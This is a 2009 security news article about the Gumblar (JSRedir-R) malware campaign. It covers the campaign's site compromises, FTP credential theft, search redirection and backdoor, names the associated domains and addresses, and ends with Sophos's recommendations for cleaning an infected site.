[ insider_reports_insider ]
Gumblar Backdoors The Internet
SecurityProNews
Staff Writer
2009-05-21
 Insider Reports RSS Feed
If you were trying to think of a name for an ogre, Gumblar might be a good choice. In this case, though, we're talking about one nasty "botnet of compromised" websites that's gaining steam quickly and screwing with people's Google search results.
 | | Gumblar Backdoors The Internet |  |
Gumblar's a real clever snotbot, too. Once initial access is cut off, it backdoors a site to continue. Once again, we can thank a domain in China for the headache, tracking the headache to gumblar.cn.
Officially called JSRedir-R, Gumblar is a Trojan script now accounting for over 40 percent of the malicious code found on infected websites Its nearest rival saturates just seven percent.
In a nutshell, the virus targets both popular websites, Internet Explorer users, and Google searchers. Websites ranking well in Google are targeted and, if not properly protected (experts are guessing with sufficient log-in credentials), the code affects visitors downloading PDF or Flash Player files who have not updated their Adobe products. Once a person's machine is infected, their Google searches are redirected to more malicious websites.
But wait, it gets worse. Experts think the goal is the usual one of monitoring traffic and collective log-in information and passwords. But it's not looking necessarily for regular user credentials. It's looking FTP credentials on victims' computers so that if the victim operates a website, hackers can gain access to it and inject more code. What makes Gumblar so wickedly tricky, though, is the way it backdoors websites after an initial viral scrubbing.
Security researchers have been tracking Gumblar since March, and everything seemed rather copasetic as far as malware goes. Infected sites were quickly delisted from Google's index until webmasters could clean up their code. And then, according to ScanSafe:
As Google began delisting the compromised websites, those site owners began cleaning up the mal-scripts pointing to 94.247.2.195. Likely as a defensive maneuver, in early May the attackers began replacing the mal-scripts pointing to 94.247.2.195 with dynamically generated and heavily obfuscated mal-scripts pointing to gumblar.cn. Blacklisting based on the original mal-script would thus be defeated, allowing the compromised sites to once again be listed by search engines.
In addition, Gumblar installs a backdoor connecting to 78.109.29.112, which is the address of a notorious botnet command and control center.
If you run an infected site, Sophos recommends the following:
· Take the site down to protect other Internet users.
· Replace the contents of the site with a known clean backup
· Change all password on the site (including FTP credentials)
· Patch all the sites software
· Reload the site.
View All Articles by SecurityProNews
About the Author:
SecurityProNews is a daily online and email publication focusing on internet security issues.
More insider_reports_insider Articles
Insider Reports RSS Feed
|
|
iEntry 10th Anniversary
RSS
Archive
